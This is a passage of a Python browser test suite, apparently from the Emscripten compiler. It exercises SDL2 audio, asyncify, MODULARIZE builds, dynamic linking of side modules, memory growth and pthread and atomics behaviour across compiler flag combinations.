    shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
    self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)

@parameterized({
    'wav': ([], '0', 'the_entertainer.wav'),
    'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
    'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
    # SDL2_mixer music decoding per format; SDL2_MIXER_FORMATS selects the
    # codecs built into the port, FLAGS is the matching Mix_Init() flag.
    shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
    self.btest('sdl2_mixer_music.c', expected='1', args=[
        '--preload-file', music_name,
        '-DSOUND_PATH=' + json.dumps(music_name),
        '-DFLAGS=' + flags,
        '-s', 'USE_SDL=2',
        '-s', 'USE_SDL_MIXER=2',
        '-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
        '-s', 'INITIAL_MEMORY=33554432'
    ])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
    # Cocos2d-x HelloCpp sample via the USE_COCOS2D port; reftest.
    cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
    preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
    self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
               args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
                     '--preload-file', preload_file, '--use-preload-plugins',
                     '-Wno-inconsistent-missing-override'],
               message='You should see Cocos2d logo')
def test_async(self):
    # Basic asyncify sleep/resume across all optimization levels.
    for opts in [0, 1, 2, 3]:
        print(opts)
        self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())

@requires_threads
def test_async_in_pthread(self):
    # Asyncify inside a pthread, with main() proxied to a pthread.
    self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])

def test_async_2(self):
    # Error.stackTraceLimit default to 10 in chrome but this test relies on more
    # than 40 stack frames being reported.
    create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
    self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())

def test_async_virtual(self):
    # Asyncify through virtual function calls.
    for opts in [0, 3]:
        print(opts)
        self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())

def test_async_virtual_2(self):
    # As above, with assertions and SAFE_HEAP enabled.
    for opts in [0, 3]:
        print(opts)
        self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
    'O0': ([],), # noqa
    'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
    self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())

def test_async_mainloop(self):
    # Asyncify sleeps inside an emscripten_set_main_loop callback.
    for opts in [0, 3]:
        print(opts)
        self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())

@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
    # SDL audio interleaved with asyncify sleeps; long-running, so larger timeout.
    self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL'] + self.get_async_args(), timeout=90)

def test_mainloop_reschedule(self):
    # Rescheduling the main loop from within itself.
    self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())

def test_mainloop_infloop(self):
    # A main loop that never returns control.
    self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())

def test_async_iostream(self):
    # Asyncify interacting with C++ iostreams.
    self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
    'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
    'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
    'nothing': (['-DBAD'],), # noqa
    'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
    'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
    # The '@file' response-file form needs the file to exist on disk.
    if '@' in str(args):
        create_test_file('filey.txt', '["sync_tunnel"]')
    self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])

def test_async_stack_overflow(self):
    # A tiny ASYNCIFY_STACK_SIZE should be detected as an overflow.
    self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])

def test_async_bad_list(self):
    # An ASYNCIFY_ONLY list naming a nonexistent function.
    self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
    self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
    self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
    """MODULARIZE builds: the factory (Module / EXPORT_NAME) must return a
    promise, must not pollute the global scope when renamed, and must accept
    a Module options object whose .then() delivers the instance."""
    for opts in [
        [],
        ['-O1'],
        ['-O2', '-profiling'],
        ['-O2'],
        ['-O2', '--closure', '1']
    ]:
        for args, code in [
            # defaults
            # BUGFIX: '!' binds tighter than 'instanceof', so the original
            # `!promise instanceof Promise` evaluated `(!promise) instanceof
            # Promise`, which is always false — the check could never throw.
            ([], '''
              let promise = Module();
              if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
            '''),
            # use EXPORT_NAME
            (['-s', 'EXPORT_NAME="HelloWorld"'], '''
              if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
              HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
              let promise = HelloWorld();
              if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
            '''),
            # pass in a Module option (which prevents main(), which we then invoke ourselves)
            (['-s', 'EXPORT_NAME="HelloWorld"'], '''
              HelloWorld({ noInitialRun: true }).then(hello => {
                hello._main();
              });
            '''),
            # Even without a mem init file, everything is async
            (['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
              HelloWorld({ noInitialRun: true }).then(hello => {
                hello._main();
              });
            '''),
        ]:
            print('test on', opts, args, code)
            # this test is synchronous, so avoid async startup due to wasm features
            self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
            create_test_file('a.html', '''
              <script src="a.out.js"></script>
              <script>
                %s
              </script>
            ''' % code)
            self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
    # A MODULARIZE build whose .wasm is deleted: the factory's promise must
    # reject with the fetch-failure abort message rather than hang.
    test_c_path = path_from_root('tests', 'browser_test_hello_world.c')
    browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')

    self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
    create_test_file('a.html', '''
      <script src="a.out.js"></script>
      <script>
        createModule()
          .then(() => {
            reportResultToServer("Module creation succeeded when it should have failed");
          })
          .catch(err => {
            reportResultToServer(err.message.slice(0, 54));
          });
      </script>
    ''')
    print('Deleting a.out.wasm to cause a download error')
    os.remove('a.out.wasm')
    self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
    # An error thrown during module init must reject the factory's promise
    # (and not surface as an unhandled rejection).
    test_cpp_path = path_from_root('tests', 'browser', 'test_modularize_init_error.cpp')
    browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')

    self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
    create_test_file('a.html', '''
      <script src="a.out.js"></script>
      <script>
        if (typeof window === 'object') {
          window.addEventListener('unhandledrejection', function(event) {
            reportResultToServer("Unhandled promise rejection: " + event.reason.message);
          });
        }
        createModule()
          .then(() => {
            reportResultToServer("Module creation succeeded when it should have failed");
          })
          .catch(err => {
            reportResultToServer(err);
          });
      </script>
    ''')
    self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
    # amount of memory different from the default one that will be allocated for the emscripten heap
    totalMemory = 33554432

    for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
        # the main function simply checks that the amount of allocated heap memory is correct
        create_test_file('test.c', r'''
          #include <stdio.h>
          #include <emscripten.h>
          int main() {
            EM_ASM({
              // use eval here in order for the test with closure compiler enabled to succeed
              var totalMemory = Module['INITIAL_MEMORY'];
              assert(totalMemory === %d, 'bad memory size');
            });
            REPORT_RESULT(0);
            return 0;
          }
        ''' % totalMemory)
        # generate a dummy file
        create_test_file('dummy_file', 'dummy')
        # compile the code with the modularize feature and the preload-file option enabled
        # no wasm, since this tests customizing total memory at runtime
        self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
        create_test_file('a.html', '''
          <script src="a.out.js"></script>
          <script>
            // instantiate the Foo module with custom INITIAL_MEMORY value
            var foo = Foo({ INITIAL_MEMORY: %d });
          </script>
        ''' % totalMemory)
        self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
    # see original in test_core.py
    # Run the WebIDL binder to generate glue code, then build and run the
    # C++ side against it in the browser at several optimization levels.
    self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
                      path_from_root('tests', 'webidl', 'test.idl'),
                      'glue'])
    self.assertExists('glue.cpp')
    self.assertExists('glue.js')
    for opts in [[], ['-O1'], ['-O2']]:
        print(opts)
        self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
    """MAIN_MODULE / SIDE_MODULE dynamic linking: a side module exports a
    function the main module calls; checked on the main thread, in a worker
    (sync binary read available), and with auto-preloading."""
    create_test_file('pre.js', '''
      Module.dynamicLibraries = ['side.wasm'];
    ''')
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <emscripten.h>
      char *side(const char *data);
      int main() {
        char *temp = side("hello through side\n");
        char *ret = (char*)malloc(strlen(temp)+1);
        strcpy(ret, temp);
        temp[1] = 'x';
        EM_ASM({
          Module.realPrint = out;
          out = function(x) {
            if (!Module.printed) Module.printed = x;
            Module.realPrint(x);
          };
        });
        puts(ret);
        EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
        REPORT_RESULT(2);
        return 0;
      }
    ''')
    create_test_file('side.cpp', r'''
      #include <stdlib.h>
      #include <string.h>
      char *side(const char *data);
      char *side(const char *data) {
        char *ret = (char*)malloc(strlen(data)+1);
        strcpy(ret, data);
        return ret;
      }
    ''')
    self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
    self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])

    print('wasm in worker (we can read binary data synchronously there)')

    create_test_file('pre.js', '''
      var Module = { dynamicLibraries: ['side.wasm'] };
    ''')
    self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
    self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])

    print('wasm (will auto-preload since no sync binary reading)')

    create_test_file('pre.js', '''
      Module.dynamicLibraries = ['side.wasm'];
    ''')
    # same wasm side module works
    self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
    '': ([0],),
    'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
    # Driver for the shared _test_dylink_dso_needed scenario; `inworker`
    # selects whether the main module runs proxied to a worker.
    self.emcc_args += ['-O2']
    # --proxy-to-worker only on main
    if inworker:
        self.emcc_args += ['--proxy-to-worker']

    def do_run(src, expected_output):
        # XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
        # -> do the assert about expected output inside browser.
        #
        # we have to put the hook into post.js because in main it is too late
        # (in main we won't be able to catch what static constructors inside
        # linked dynlibs printed), and in pre.js it is too early (out is not yet
        # setup by the shell).
        create_test_file('post.js', r'''
            Module.realPrint = out;
            out = function(x) {
              if (!Module.printed) Module.printed = "";
              Module.printed += x + '\n'; // out is passed str without last \n
              Module.realPrint(x);
            };
        ''')
        create_test_file('test_dylink_dso_needed.c', src + r'''
          #include <emscripten/em_asm.h>
          int main() {
            int rtn = test_main();
            EM_ASM({
              var expected = %r;
              assert(Module.printed === expected, ['stdout expected:', expected]);
            });
            return rtn;
          }
        ''' % expected_output)
        self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), 0, args=self.get_emcc_args() + ['--post-js', 'post.js'])

    self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
    # Dynamic linking combined with legacy GL emulation: the side module
    # initializes SDL/GL and the main module checks the extensions string.
    create_test_file('pre.js', '''
      Module.dynamicLibraries = ['side.wasm'];
    ''')
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include <string.h>
      #include <assert.h>
      const char *side();
      int main() {
        const char *exts = side();
        puts(side());
        assert(strstr(exts, "GL_EXT_texture_env_combine"));
        REPORT_RESULT(1);
        return 0;
      }
    ''')
    create_test_file('side.cpp', r'''
      #include "SDL/SDL.h"
      #include "SDL/SDL_opengl.h"
      const char *side() {
        SDL_Init(SDL_INIT_VIDEO);
        SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
        return (const char *)glGetString(GL_EXTENSIONS);
      }
    ''')
    self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
    self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
    # test asynchronously loading two side modules during startup
    """Load two side modules asynchronously at startup and sum their results."""
    create_test_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
    create_test_file('main.c', r'''
int side1();
int side2();
int main() {
  return side1() + side2();
}
''')
    create_test_file('side1.c', r'''
int side1() { return 1; }
''')
    create_test_file('side2.c', r'''
int side2() { return 2; }
''')
    self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
    self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
    # Expected exit status is 1 + 2 = 3.
    self.btest_exit(self.in_dir('main.c'), '3',
                    args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
    """Preload a file larger than INITIAL_MEMORY so the heap must grow while starting up."""
    payload = 'X' * (30 * 1024 * 1024)  # 30MB, well beyond the 16MB initial heap
    create_test_file('data.dat', payload)
    growth_flags = ['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH',
                    '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384',
                    '--preload-file', 'data.dat']
    self.btest('browser_test_hello_world.c', '0', args=growth_flags)
# pthreads tests
def prep_no_SAB(self):
    """Write html.html: the minimal shell with SharedArrayBuffer/Atomics hidden.

    Simulates a browser without threading support so tests can check
    graceful fallback behavior.
    """
    create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
    """Exercise the C11 <threads.h> API on top of pthreads, proxied to a pthread."""
    c11_flags = ['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS',
                 '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb']
    src = path_from_root('tests', 'pthread', 'test_pthread_c11_threads.c')
    self.btest(src, expected='0', force_c=True, args=c11_flags)
# Test that the emscripten_ atomics api functions work.
@parameterized({
    'normal': ([],),
    'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
    """Run the emscripten_atomic_* API checks, with and without closure."""
    base_flags = ['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                  '-s', 'PTHREAD_POOL_SIZE=8', '-g1']
    src = path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp')
    self.btest(src, expected='0', args=base_flags + args)
@requires_threads
def test_pthread_64bit_atomics(self):
    """Test 64-bit atomic operations across a pool of pthreads."""
    src = path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8'])
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
    """Test 64-bit C++11 std::atomic, at -O0/-O3, with and without pthreads enabled."""
    src = path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp')
    for opt_flags in (['-O0'], ['-O3']):
        for thread_flags in ([], ['-s', 'USE_PTHREADS']):
            self.btest(src, expected='0', args=opt_flags + thread_flags)
@requires_threads
def test_pthread_hardware_concurrency(self):
    """Test std::thread::hardware_concurrency(), sizing the pool from the browser."""
    src = path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp')
    # Pool size is evaluated in JS from navigator.hardwareConcurrency at startup.
    self.btest(src, expected='0',
               args=['-O2', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
    'join': ('join',),
    'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
    """Check main-thread blocking (pthread_join / futex wait) behavior.

    Covers: erroring when ALLOW_BLOCKING_ON_MAIN_THREAD=0, warning-only by
    default, pthread_tryjoin_np being allowed, and blocking being fine on a
    proxied pthread. Expected result codes distinguish the outcomes.
    """
    print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
    self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
    if name == 'join':
        print('Test that by default we just warn about blocking on the main thread.')
        self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
        print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
        self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
        print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
        self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
        print('Test that everything works ok when we are on a pthread.')
        self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
    """Test legacy __sync_fetch_and_* builtins across optimization/debug combos."""
    src = path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp')
    thread_flags = ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']
    for opt_flags in ([], ['-O1'], ['-O2'], ['-O3'], ['-Os']):
        for dbg_flags in ([], ['-g']):
            combo = opt_flags + dbg_flags
            print(combo)
            self.btest(src, expected='0', args=combo + thread_flags)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
    """64-bit variant of the __sync_fetch_and_* builtin test."""
    src = path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8'],
               also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
    """Test legacy __sync_op_and_fetch builtins under a pthread pool."""
    src = path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8'],
               also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
    """64-bit variant of the __sync_op_and_fetch builtin test."""
    src = path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8'],
               also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
    """Cover the remaining GCC __sync_* atomic builtins."""
    src = path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
    """Test spinlock primitives, both GCC builtins and emscripten intrinsics."""
    src = path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp')
    base_flags = ['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                  '-s', 'PTHREAD_POOL_SIZE=8']
    for variant in ([], ['-DUSE_EMSCRIPTEN_INTRINSICS']):
        self.btest(src, expected='800', args=base_flags + variant, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
    """Spawn threads from a preallocated pool; result must be fully deterministic."""
    def test(args):
        # Show which extra flags this configuration uses.
        print(args)
        self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
                   expected='0',
                   args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
                   extra_tries=0) # this should be 100% deterministic
        print() # new line
    test([])
    test(['-O3'])
    # TODO: re-enable minimal runtime once the flakiness is figure out,
    # https://github.com/emscripten-core/emscripten/issues/12368
    # test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
    """Verify workers are preallocated for the pool with PTHREAD_POOL_DELAY_LOAD.

    Fix: the args list contained a stray duplicated '-s' ('-s', '-s',
    'USE_PTHREADS'), which makes emcc interpret '-s' itself as a setting
    name instead of pairing '-s' with 'USE_PTHREADS'.
    """
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'),
               expected='0',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4',
                     '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
    """Allocate many threads; timing regression must be checked manually from the output.

    Fix: removed a stray duplicated '-s' ('-s', '-s', 'USE_PTHREADS') from
    the args list, which would make emcc treat '-s' as the setting name
    instead of pairing it with 'USE_PTHREADS'.
    """
    self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'),
               expected='0',
               args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=50'],
               message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
    """Run main() on a proxied pthread instead of the browser main thread."""
    src = path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c')
    self.btest(src, expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
    """A pthread spawns a child pthread; also checked under MODULARIZE."""
    src = path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp')
    base_flags = ['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2']
    modularize_flags = ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule',
                        '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]
    for extra in ([], modularize_flags):
        self.btest(src, expected='1', args=base_flags + extra)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
    """Pthreads spawn pthreads and immediately join on them."""
    src = path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp')
    self.btest(src, expected='1',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
    """Main thread blocks in pthread_join() and receives the worker's result."""
    src = path_from_root('tests', 'pthread', 'test_pthread_join.cpp')
    self.btest(src, expected='6765',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
    """A detached std::thread returns its worker to the pool after finishing."""
    src = path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp')
    self.btest(src, expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
    """Cancel a running pthread via pthread_cancel()."""
    src = path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp')
    self.btest(src, expected='1',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
    """Send a signal to a pthread via pthread_kill()."""
    src = path_from_root('tests', 'pthread', 'test_pthread_kill.cpp')
    self.btest(src, expected='0',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
    """Exercise pthread_cleanup_push/pthread_cleanup_pop handlers."""
    src = path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp')
    self.btest(src, expected='907640832',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
